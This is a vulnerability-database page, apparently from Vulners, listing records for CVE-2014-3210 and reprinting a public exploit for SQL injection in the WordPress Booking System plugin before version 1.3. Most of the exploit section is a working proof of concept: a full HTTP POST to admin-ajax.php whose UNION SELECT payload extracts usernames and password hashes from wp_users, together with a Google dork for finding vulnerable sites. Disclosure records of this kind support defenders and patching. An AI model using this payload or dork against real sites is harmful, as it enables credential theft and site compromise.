| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2014-3210 | 21 May 201400:00 | – | circl | |
| CVE-2014-3210 | 22 May 201415:00 | – | cve | |
| CVE-2014-3210 | 22 May 201415:00 | – | cvelist | |
| EUVD-2014-3228 | 7 Oct 202500:30 | – | euvd | |
| K16834: OpenSSL vulnerability CVE-2011-3210 | 21 Feb 202319:41 | – | f5 | |
| SOL16834 - OpenSSL vulnerability CVE-2011-3210 | 1 Jul 201500:00 | – | f5 | |
| CVE-2014-3210 | 22 May 201415:13 | – | nvd | |
| WordPress Booking System Plugin - SQL Injection | 21 May 201400:00 | – | patchstack | |
| WordPress Booking Calendar Plugin - SQL Injection | 21 May 201400:00 | – | patchstack | |
| Sql injection | 22 May 201415:13 | – | prion |
`# Exploit Title: Wordpress Booking System (Booking Calendar) plugin
SQL Injection
# Release Date: 2014-05-21
# Author: maodun
# Contact: Twitter: @conmancm
# Software Link: http://wordpress.org/support/plugin/booking-system
# Affected version: < 1.3
# Google Dork: inurl:/wp-content/plugins/booking-system/
# REF:CVE-2014-3210
-----------------------------------------------------------------------------------------------------------------
# Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.
-------------------------------------------------------------------------------------------------------------------------
# SQLi - Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php
vulnerabile parameter:$_POST['booking_form_id']
POC:
POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 149
Cookie: [your cookie]
action=dopbs_show_booking_form_fields&booking_form_id=100 union select
1,2,3,4,5,6,7,8,9,hex(concat(user_login,user_pass)) from
wp_users#&language=cr
response:
<input type="hidden" name="booking-form-field-translation-1"
id="booking-form-field-translation-1" value="[hex value here]" />
-------------------------------------------------------------------------------------------------------------------------
# Patch:
-- Vendor was notified on the 2014-05-05
-- Vendor released version 1.3 on 2014-05-06 Fixed the bug
-------------------------------------------------------------------------------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation